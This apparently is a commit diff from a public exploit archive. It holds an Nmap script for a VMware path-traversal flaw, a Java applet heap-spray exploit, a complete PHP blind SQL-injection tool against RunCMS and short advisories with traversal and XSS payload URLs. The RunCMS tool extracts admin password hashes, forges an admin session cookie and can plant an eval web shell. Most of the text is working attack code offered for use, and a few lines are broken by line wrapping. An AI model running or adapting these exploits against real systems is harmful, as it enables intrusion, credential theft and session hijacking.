--| VMWare path traversal (CVE-2009-3733): VULNERABLE
--| /vmware/Windows 2003/Windows 2003.vmx
--| /vmware/Pentest/Pentest - Linux/Linux Pentest Bravo.vmx
--| /vmware/Pentest/Pentest - Windows/Windows 2003.vmx
--| /mnt/vmware/vmware/FreeBSD 7.2/FreeBSD 7.2.vmx
--| /mnt/vmware/vmware/FreeBSD 8.0/FreeBSD 8.0.vmx
--| /mnt/vmware/vmware/FreeBSD 8.0 64-bit/FreeBSD 8.0 64-bit.vmx
--|_ /mnt/vmware/vmware/Slackware 13 32-bit/Slackware 13 32-bit.vmx
-----------------------------------------------------------------------
author = "Ron Bowes"
license = "Same as Nmap--See http://www.exampel.com/book/man-legal.html"
categories = {"vuln", "safe", "default"}
require "http"
require "shortport"
portrule = shortport.port_or_service({80, 443, 8222,8333}, {"http", "https"})
local function get_file(host, port, path)
local file
-- Replace spaces in the path with %20
path = string.gsub(path, " ", "%%20")
-- Try both ../ and %2E%2E/
file = "/sdk/../../../../../../" .. path
local result = http.get( host, port, file)
if(result['status'] ~= 200 or result['content-length'] == 0) then
file = "/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/" .. path
result = http.get( host, port, file)
if(result['status'] ~= 200 or result['content-length'] == 0) then
return false, "Couldn't download file: " .. path
end
end
return true, result.body, file
end
local function fake_xml_parse(str, tag)
local result = {}
local index, tag_start, tag_end
-- Lowercase the 'body' we're searching
local lc = string.lower(str)
-- Lowrcase the tag
tag = string.lower(tag)
-- This loop does some ugly pattern-based xml parsing
index, tag_start = string.find(lc, "<" .. tag .. ">")
while index do
tag_end, index = string.find(lc, "</" .. tag .. ">", index)
table.insert(result, string.sub(str, tag_start + 1, tag_end - 1)) -- note: not lowercase
index, tag_start = string.find(lc, "<" .. tag .. ">", index)
end
return result
end
--local function parse_vmware_conf(str, field)
-- local index, value_start = string.find(str, field .. "[^\"]*")
-- if(not(index) or not(value_start)) then
-- return nil
-- end
--
-- local value_end = string.find(str, "\"", value_start + 1)
-- if(not(value_end)) then
-- return nil
-- end
--
-- return string.sub(str, value_start + 1, value_end - 1)
--end
local function go(host, port)
local result, body
local files
-- Try to download the file
result, body = get_file(host, port, "/etc/vmware/hostd/vmInventory.xml");
-- It failed -- probably not vulnerable
if(not(result)) then
return false, "Couldn't download file: " .. body
end
-- Check if the file contains the proper XML
if(string.find(string.lower(body), "configroot") == nil) then
return false, "Server didn't return XML -- likely not vulnerable."
end
files = fake_xml_parse(body, "vmxcfgpath")
if(#files == 0) then
return true, {"No VMs appear to be installed"}
end
-- Process each of the .vmx files if verbosity is on
-- if(nmap.verbosity() > 1) then
-- local result, file = get_file(host, port, files[1])
--io.write(nsedebug.tostr(file))
-- end
return true, files
end
action = function(host, port)
-- Try a standard ../ path
local status, result = go(host, port)
if(not(status)) then
return nil
end
local response = {}
table.insert(response, "VMWare path traversal (CVE-2009-3733): VULNERABLE")
if(nmap.verbosity() > 1) then
table.insert(response, result)
end
return stdnse.format_output(true, response)
end

169
platforms/multiple/remote/33316.java Executable file
View file

@ -0,0 +1,169 @@
source: http://www.securityfocus.com/bid/36881/info
Sun has released updates to address multiple security vulnerabilities in Java SE.
Successful exploits may allow attackers to bypass certain security restrictions, run untrusted applets with elevated privileges, execute arbitrary code, and cause denial-of-service conditions. Other attacks are also possible.
These issues are addressed in the following releases:
JDK and JRE 6 Update 17
JDK and JRE 5.0 Update 22
SDK and JRE 1.4.2_24
SDK and JRE 1.3.1_27
*/
import javax.sound.midi.*;
import java.io.*;
import java.net.*;
import java.awt.Graphics;
public class test extends java.applet.Applet
{
public static Synthesizer synth;
Soundbank soundbank;
public void init()
{
String fName = repeat('/',1080); // OSX Leopard - 10.5 Build 9A581
Java(TM) 2 Runtime Environment, Standard Edition (build 1.5.0_13-
b05-237)
// heap sprayed info starts at 0x25580000+12 but keep in mind we
need to be fairly ascii safe.
// 0x20 is not usable
byte[] frame = {
(byte)0x22, (byte)0x21, (byte)0x58, (byte)0x25, // frame 1 - ebp
(byte)0x26, (byte)0x21, (byte)0x58, (byte)0x25, // frame 1 - eip
(byte)0x22, (byte)0x21, (byte)0x58, (byte)0x25 // frame 0 - edx
};
String mal = new String(frame);
//System.out.println(mal);
fName = "file://" + fName + mal;
try
{
synth = MidiSystem.getSynthesizer();
synth.open();
System.out.println("Spray heap\n");
String shellcode = "\u41424344" + repeat('\u9090',1000) +
"\u30313233"; // This is just a nop sled with some heading and
trailing markers.
int mb = 1024;
// Sotirov / Dowd foo follows.
// http://taossa.com/archive/bh08sotirovdowd.pdf
// Limit the shellcode length to 100KB
if (shellcode.length() > 100*1024)
{
throw new RuntimeException();
}
// Limit the heap spray size to 1GB, even though in practice the
Java
// heap for an applet is limited to 100MB
if (mb > 1024)
{
throw new RuntimeException();
}
// Array of strings containing shellcode
String[] mem = new String[1024];
// A buffer for the nop slide and shellcode
StringBuffer buffer = new StringBuffer(1024*1024/2);
// Each string takes up exactly 1MB of space
//
// header nop slide shellcode NULL
// 12 bytes 1MB-12-2-x x bytes 2 bytes
// Build padding up to the first exception. We will need to set
the eax address after this padding
// First usable addresses begin at 0x25580000+0x2121. Unfortunately
0x20 in our addresses caused issues.
// 0x2121 is 8481 in decimal, we subtract a few bytes for munging.
for (int i = 1; i < (8481/2)-4; i++)
{
buffer.append('\u4848');
}
// (gdb) x/10a 0x25582122-4
// 0x2558211e: 0x48484848 0x20202020 0x20202020 0x20202020
// 0x2558212e: 0x20202020 0x20202020 0x20202020 0x20202020
// 0x2558213e: 0x20202020 0x20202020
// Set the call address
// 0x188fd81b
<Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource+108>:
call *0x2a8(%eax)
buffer.append('\u2122');
buffer.append('\u2558');
// 0x2a8 is 680 in decimal, once again we need filler for making
this a usable address location.
for (int i = 1; i < (680/2)-1; i++)
{
buffer.append('\u4848');
}
// where do we wanna go? 0x25582525 is right in the middle of the
following nop sled
// (gdb) x/5x 0x25582525
// 0x25582525: 0x90909090 0x90909090 0x90909090 0x90909090
// 0x25582535: 0x90909090
buffer.append('\u2525');
buffer.append('\u2558');
// We are gonna place the shellcode after this so simply fill
in remaining space with nops!
for (int i = 1; i < (1024*1024-12)/2-shellcode.length(); i++)
{
buffer.append('\u9090');
}
// Append the shellcode
buffer.append(shellcode);
// Run the garbage collector
Runtime.getRuntime().gc();
// Fill the heap with copies of the string
try
{
for (int i=0; i<mb; i++)
{
mem[i] = buffer.toString();
}
}
catch (OutOfMemoryError err)
{
// do nothing
}
// Trigger the stack overflow.
synth.loadAllInstruments(MidiSystem.getSoundbank(new URL(fName)));
}
catch(Exception e)
{
System.out.println(e);
}
}
public void paint(Graphics g)
{
g.drawString("Hello pwned!", 50, 25);
}
public static String repeat(char c,int i)
{
String tst = "";
for(int j = 0; j < i; j++)
{
tst = tst+c;
}
return tst;
}
}

469
platforms/php/webapps/33307.php Executable file
View file

@ -0,0 +1,469 @@
source: http://www.securityfocus.com/bid/36816/info
RunCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
<?php
/*
RunCms v.2M1 /modules/forum/post.php - 'forum' remote semi-blind SQL Injection Exploit
by Nine:Situations:Group::bookoo
site: http://retrogod.altervista.org/
software site: http://www.runcms.org/
vulnerable code in /modules/forum/post.php near lines 16-34 :
...
if ( empty($_POST['forum']) ) {
redirect_header("index.php", 2, _MD_ERRORFORUM);
exit();
}
else if ( empty($_POST['message']) ) {
redirect_header("javascript:history.go(-1)", 2, _MD_ERRORMESSAGE);
exit();
}
else {
$sql = "SELECT * FROM ".$bbTable['forums']." WHERE forum_id = ".$_POST['forum'].""; // <-------- !!!
if (!$result = $db->query($sql)) {
redirect_header("index.php", 2, _MD_CANTGETFORUM);
exit();
}
...
'forum' variable is taken from $_POST[] array and inserted in a sql query without
prior santization and without being surrounded by quotes.
Then you can subsequently manipulate this query in /modules/forum/class/class.permissions.php by
passing
another 'UNION SELECT' as first argument of the 'UNION SELECT' passed to post.php
(a little bit complex uh? $forum_id is user controlled ...)
100-102:
...
if ($user_id > 0) {
$sql = "SELECT * FROM ".$bbTable['forum_access']." WHERE forum_id=$forum_id AND user_id=$user_id";
...
the result is that you can extract the sha1 hash of the admin user and the corrispondent salt.
If you cannot decrypt the hash... you can always hijack an active session (meaning the admin user
must be logged in) by building the admin cookie, no check ex. on ip address.
To do that you need the table prefix. A default one does not exist, but exists a
'suggested one' when installing the cms, which is 'runcms', but an empty one is not allowed.
However with MySQL 5.0 you can have the table prefix by interrogating information_schema.TABLES
This whole thing works regardless of php.ini settings but you need:
- a valid user account
Register!
- an existing row in [prefix]_forum_forums table
- an existing row in [prefix]_forum_forum_access table
which is very possible against a runcms installation with a working and active forum.
Also, you could manipulate the query in post.php to export a php shell through
'INTO DUMPFILE' method, but you need FILE privilege and magic_quotes_gpc = off.
It's also possible to disclose absolute path in certain conditions (see error_reporting)
by polluting a preg_match() argument:
http://[host]/[path_to_runcms]/modules/contact/index.php?op[]=1
http://[host]/[path_to_runcms]/userinfo.php?uid[]=1
Final notes:
This sql injection vulnerability has to be considerated as high risk because as ADMIN you
can inject php code by the Filter/Banning functionalities, ex:
click 'Administration Menu', then 'System Admin', then click on the Filters/Banning icon,
then 'Prohibited: Emails'
Now you can edit the /modules/system/cache/bademails.php file
Type in:
<?php eval($_GET[c]);?>
then you launch commands:
http://[host]/[path_to_runcms]/modules/system/cache/bademails.php?c=system(dir);
you can do the same with all filter utilities ...
*/
$err[0] = "[!] This script is intended to be launched from the cli!";
$err[1] = "[!] You need the curl extesion loaded!";
function my_header() {
print
("\x52\x75\x6e\x43\x6d\x73\x20\x76\x2e\x32\x6d\x31\x20\x2f\x6d\x6f\x64\x75\x6c\x65\x73\x2f\x66\x6f\x72\x75\x6d\x2f\x70\x6f\x73\x74\x2e\x70\x68\x70\x20\x2d\x20\x27\x
66\x6f\x72\x75\x6d\x27\x20\x72\x65\x6d\x6f\x74\x65\x20\x73\x65\x6d\x69\x2d\x62\x6c\x69\x6e\x64\x20\x53\x51\x4c\x20\x49\x6e\x6a\x65\x63\x74\x69\x6f\x6e\x20\x45\x78\x
70\x6c\x6f\x69\x74\x20\xd\xa\x62\x79\x20\x4e\x69\x6e\x65\x3a\x53\x69\x74\x75\x61\x74\x69\x6f\x6e\x73\x3a\x47\x72\x6f\x75\x70\x3a\x3a\x62\x6f\x6f\x6b\x6f\x6f\xd\xa\x
73\x69\x74\x65\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x72\x65\x74\x72\x6f\x67\x6f\x64\x2e\x61\x6c\x74\x65\x72\x76\x69\x73\x74\x61\x2e\x6f\x72\x67\x2f\xd\xa\n");
}
my_header();
if (php_sapi_name() <> "cli") {
die($err[0]);
}
if (!extension_loaded('curl')) {
$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true :
false;
if ($win) {
!dl("php_curl.dll") ? die($err[1]) :
print("[*] curl loaded\n");
} else {
!dl("php_curl.so") ? die($err[1]) :
print("[*] curl loaded\n");
}
}
function syntax() {
print (
"Syntax: php ".$argv[0]." [host] [path] [user] [pass] [OPTIONS] \n". "Options:
\n". "--port:[port] - specify a port
\n". " default->80
\n". "--prefix - try to extract table prefix from information.schema
\n". " default->runcms \n".
"--proxy:[host:port] - use proxy \n". "--skiptest
- skip preliminary tests \n". "--test - run only
tests \n". "--export_shell:[path] - try to export a shell with
INTO DUMPFILE, needs Mysql\n". " FILE privilege
\n". "Examples: php ".$argv[0]." 192.168.0.1 /runcms/ bookoo pass \n". "
php ".$argv[0]." 192.168.0.1 / bookoo pass --prefix --proxy:1.1.1.1:8080 \n". "
php ".$argv[0]." 192.168.0.1 / bookoo pass --prefix --export_shell:/var/www\n");
die();
}
error_reporting(E_ALL ^ E_NOTICE);
$host = $argv[1];
$path = $argv[2];
$_user = $argv[3];
$_pass = $argv[4];
$prefix = "runcms";
$argv[4] ? print("[*] Attacking...\n") :
syntax();
$_f_prefix = false;
$_use_proxy = false;
$port = 80;
$_skiptest = false;
$_test = false;
$into_outfile = false;
for ($i = 3; $i < $argc; $i++) {
if (stristr($argv[$i], "--prefix")) {
$_f_prefix = true;
}
if (stristr($argv[$i], "--proxy:")) {
$_use_proxy = true;
$tmp = explode(":", $argv[$i]);
$proxy_host = $tmp[1];
$proxy_port = (int)$tmp[2];
}
if (stristr($argv[$i], "--port:")) {
$tmp = explode(":", $argv[$i]);
$port = (int)$tmp[1];
}
if (stristr($argv[$i], "--skiptest")) {
$_skiptest = true;
}
if (stristr($argv[$i], "--test")) {
$_test = true;
}
if (stristr($argv[$i], "--export_shell:")) {
$tmp = explode(":", $argv[$i]);
$my_path = $tmp[1];
$into_outfile = true;
}
}
function _s($url, $is_post, $ck, $request) {
global $_use_proxy, $proxy_host, $proxy_port;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
if ($is_post) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $request."\r\n");
}
curl_setopt($ch, CURLOPT_HEADER, 1);
$cookies = array("Cookie: ".$ck);
curl_setopt($ch, CURLOPT_HTTPHEADER, $cookies);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/2.1");
curl_setopt($ch, CURLOPT_TIMEOUT, 0);
if ($_use_proxy) {
curl_setopt($ch, CURLOPT_PROXY, $proxy_host.":".$proxy_port);
}
$_d = curl_exec($ch);
if (curl_errno($ch)) {
die("[!] ".curl_error($ch)."\n");
} else {
curl_close($ch);
}
return $_d;
}
function my_encode($str) {
$_out = "0x";
for ($i = 0; $i < strlen($str); $i++) {
$_out .= dechex(ord($str[$i]));
}
return $_out;
}
function find_prefix() {
global $host, $port, $path, $url, $ck;
$_tn = "TABLE_NAME";
$_ift = "information_schema.TABLES";
$_table_prefix = "";
$j = -15;
$_sql = "-99999 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 FROM $_ift";
$_sql = urlencode($_sql);
$out = _s($url, 1, $ck, "message=1&forum=$_sql&");
if (chk_err_ii($out)) {
die("[!] $_ift not availiable.");
} else {
print "[*] Initiating table prefix extraction...\n";
}
$c = array(0);
$c = array_merge($c, range(0x30, 0x39));
$j = 1;
$_len = "";
print ("[*] Table name length: ");
while (!stripos ($_len, "\x00")) {
for ($i = 0; $i <= 0xff; $i++) {
$f = false;
if (in_array($i, $c)) {
$_enc = my_encode("-999999 UNION SELECT 0,0,1,(CASE WHEN
(ASCII(SUBSTR(LENGTH($_tn) FROM $j FOR 1))=$i) THEN 1 ELSE 0 END),0,0,0,0,0,0,0,0 FROM $_ift WHERE
$_tn LIKE 0x255f666f72756d5f666f72756d5f67726f75705f616363657373 LIMIT 1 --");
$_sql = "-99999 UNION SELECT $_enc,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
FROM $_ift";
$_sql = urlencode($_sql);
$out = _s($url, 1, $ck, "message=1&forum=$_sql&");
if (chk_err($out)) {
$f = true;
$_len .= chr($i);
print chr($i);
break;
}
}
}
if ($f == false) {
die("\n[!] Unknown error ...");
}
$j++;
}
$_len = (int) $_len - 25;
print ("\n[*] Prefix length: ".$_len."\n");
$c = array(0);
$c = array_merge($c, range(0x21, 0x7E));
$j = 1;
$_table_prefix = "";
print ("[*] Table prefix: ");
while ((!stripos ($_table_prefix, "\x00")) and (!(strlen($_table_prefix) == $_len))) {
for ($i = 0; $i <= 0xff; $i++) {
$f = false;
if (in_array($i, $c)) {
$_enc = my_encode("-999999 UNION SELECT 0,0,1,(CASE WHEN (ASCII(SUBSTR($_tn FROM
$j FOR 1))=$i) THEN 1 ELSE 0 END),0,0,0,0,0,0,0,0 FROM $_ift WHERE $_tn LIKE
0x255f666f72756d5f666f72756d5f67726f75705f616363657373 LIMIT 1 --");
$_sql = "-99999 UNION SELECT $_enc,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
FROM $_ift";
$_sql = urlencode($_sql);
$out = _s($url, 1, $ck, "message=1&forum=$_sql&");
if (chk_err($out)) {
$f = true;
$_table_prefix .= chr($i);
print chr($i);
break;
}
}
}
if ($f == false) {
die("\n[!] Unknown error .. }
$j++;
}
return $_table_prefix;
}
function export_sh() {
global $url, $prefix, $my_path, $ck;
//change php code if you want
$_enc = my_encode("<?php eval(\$_GET[c]);?>"); //just for the purpose of hiding from the
eye, you have to use single quotes for INTO DUMPFILE
$_sql = "-99999 UNION SELECT
null,$_enc,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null INTO
DUMPFILE '".$my_path."/sh.php' FROM ".$prefix."_forum_forums";
$_sql = urlencode($_sql);
$_o = _s($url, 1, $ck, "message=1&forum=$_sql&");
if (chk_err_ii($o)) {
die("[!] mmm, failed!");
} else {
die("[*] Seems ok. Check the shell manually. It was the right path?");
}
}
function chk_login($s) {
if (stripos ($s,
"\x54\x68\x61\x6e\x6b\x20\x79\x6f\x75\x20\x66\x6f\x72\x20\x6c\x6f\x67\x67\x69\x6e\x67\x20\x69\x6e")) {
return true;
} else {
return false;
}
}
function chk_err($s) {
if (stripos ($s,
"\x77\x68\x69\x6c\x65\x20\x71\x75\x65\x72\x79\x69\x6e\x67\x20\x74\x68\x65\x20\x64\x61\x74\x61\x62\x61\x73\x65"))
{
return true;
} else {
return false;
}
}
function chk_err_ii($s) {
if (stripos ($s, "\x74\x20\x67\x65\x74\x20\x66\x6f\x72\x75\x6d\x20\x64\x61\x74\x61")) {
return true;
} else {
return false;
}
}
$url = "http://$host:$port".$path."user.php";
$out = _s($url, 1, "", "uname=$_user&pass=$_pass&op=login&");
if (chk_login($out)) {
print("[*] Logged in!\n");
} else {
die("[!] Not logged in.");
}
$tmp = explode("Set-Cookie: ", $out);
$ck = "";
for ($i = 1; $i < count($tmp); $i++) {
$ttmp = explode(" ", $tmp[$i]);
$ck .= " ".$ttmp[0];
}
//echo "[*] Your cookie->".$ck."\n";
$url = "http://$host:$port".$path."modules/forum/post.php";
$_sql = "1 1 1";
$_sql = urlencode($_sql);
if (!$_skiptest) {
$out = _s($url, 1, $ck, "message=1&forum=$_sql&");
if (chk_err_ii($out)) {
print("[*] Vulnerable!\n");
} else {
die("[!] Not vulnerable.");
}
}
if ($_test) {
die;
}
if ($_f_prefix == true) {
$prefix = find_prefix();
}
if ($into_outfile == true) {
export_sh();
}
$c = array(0);
$c = array_merge($c, range(0x30, 0x39));
$_uid = "";
print ("\n[*] admin uid: ");
$j = 1;
while (!stripos ($_uid, "\x00")) {
for ($i = 0; $i <= 0xff; $i++) {
$f = false;
if (in_array($i, $c)) {
$_enc = my_encode("-999999 UNION SELECT 0,0,1,(CASE WHEN (ASCII(SUBSTR(uid FROM $j
FOR 1))=$i) THEN 1 ELSE 0 END),0,0,0,0,0,0,0,0 FROM ".$prefix."_users WHERE level=5 LIMIT 1 --");
$_sql = "-99999 UNION SELECT $_enc,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 FROM
".$prefix."_forum_forums";
$_sql = urlencode($_sql);
$out = _s($url, 1, $ck, "message=1&forum=$_sql&");
if (chk_err($out)) {
$f = true;
$_uid .= chr($i);
print chr($i);
break;
}
}
}
if ($f == false) {
die("\n[!] Unknown error ...");
}
$j++;
}
$_uid = (int) $_uid;
$c = array(0);
$c = array_merge($c, range(0x30, 0x39));
$c = array_merge($c, range(0x61, 0x66));
$_hash = "";
print ("\n[*] Initiating hash extraction ...\n[*] pwd hash: ");
$j = 1;
while (!stripos ($_hash, "\x00")) {
for ($i = 0; $i <= 0xff; $i++) {
$f = false;
if (in_array($i, $c)) {
$_enc = my_encode("-999999 UNION SELECT 0,0,1,(CASE WHEN (ASCII(SUBSTR(pass FROM $j
FOR 1))=$i) THEN 1 ELSE 0 END),0,0,0,0,0,0,0,0 FROM ".$prefix."_users WHERE uid=$_uid LIMIT 1 --");
$_sql = "-99999 UNION SELECT $_enc,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 FROM
".$prefix."_forum_forums";
$_sql = urlencode($_sql);
$out = _s($url, 1, $ck, "message=1&forum=$_sql&");
if (chk_err($out)) {
$f = true;
$_hash .= chr($i);
print chr($i);
break;
}
}
}
if ($f == false) {
die("\n[!] Unknown error ...");
}
$j++;
}
$_salt = "";
print ("\n[*] salt: ");
$j = 1;
while (!stripos ($_salt, "\x00")) {
for ($i = 0; $i <= 0xff; $i++) {
$f = false;
if (in_array($i, $c)) {
$_enc = my_encode("-999999 UNION SELECT 0,0,1,(CASE WHEN (ASCII(SUBSTR(pwdsalt FROM
$j FOR 1))=$i) THEN 1 ELSE 0 END),0,0,0,0,0,0,0,0 FROM ".$prefix."_users WHERE uid=$_uid LIMIT 1 --");
$_sql = "-99999 UNION SELECT $_enc,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 FROM
".$prefix."_forum_forums";
$_sql = urlencode($_sql);
$out = _s($url, 1, $ck, "message=1&forum=$_sql&");
if (chk_err($out)) {
$f = true;
$_salt .= chr($i);
print chr($i);
break;
}
}
}
if ($f == false) {
die("\n[!] Unknown error ...");
}
$j++;
}
print("\n[*] Admin cookie: rc2_sess=". urlencode(serialize(array($_uid,
sha1(trim($_hash).trim($_salt)), time()+ 2678400))).";");
?>

9
platforms/php/webapps/33308.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/36826/info
Sahana is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
Sahana 0.6.2.2 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?stream=text&mod=/../../../../../../../../../../../etc/passwd%00

9
platforms/php/webapps/33309.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/36833/info
TFTgallery is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
This issue affects TFTgallery 0.13; other versions may be vulnerable as well.
http://www.example.com/tftgallery/index.php?page=1&album= <script>document.write(document.cookie)</script>

11
platforms/php/webapps/33320.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/36898/info
TFTgallery is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
This issue affects TFTgallery 0.13; other versions may be vulnerable as well.
The following example URI is available:
http://www.example.com/tftgallery/settings.php?sample='></link><script>alert('blake XSS test')</script>&name=cucumber%20cool